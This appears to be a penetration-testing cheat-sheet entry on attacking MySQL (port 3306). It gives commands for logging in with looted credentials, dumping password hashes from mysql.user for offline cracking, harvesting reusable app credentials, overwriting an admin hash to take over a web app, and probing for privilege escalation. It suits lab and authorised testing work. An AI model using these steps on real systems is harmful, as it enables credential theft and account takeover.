← Back to search

MySQL (3306)

enumerationports

Summary

Connect with looted DB creds, dump user tables for hashes, and check app tables for credentials you can reuse or overwrite. Use \G for readable wide rows.

Walkthrough

MySQL (port 3306) is usually reached after you've found DB credentials in a web config.

Steps

  1. Connectmysql -h <IP> -u <user> -p'<pass>'.
  2. EnumerateSHOW DATABASES;, then inspect app tables. Use \G instead

of ; when rows are too wide to read.

  1. Dump hashesSELECT user, authentication_string FROM mysql.user; and

crack offline; app login tables often store reusable creds.

  1. Tamper — if you can write, overwrite an admin password hash with one you

know to log into the web app as admin.

> Local MySQL running as root can sometimes be abused for privesc (UDF / > --secure-file-priv); check after you have a shell.

Commands

bash

# Connect with recovered creds
mysql -h <IP> -P 3306 -u <USER> -p'<PASS>'

other

# Useful in-client commands
# \G        -> vertical output instead of ;
# SHOW DATABASES;
# SELECT user, authentication_string FROM mysql.user;
SHOW DATABASES;

other

# Overwrite an app password hash you control
UPDATE users SET password='<NEW_HASH>' WHERE user_id='ADM';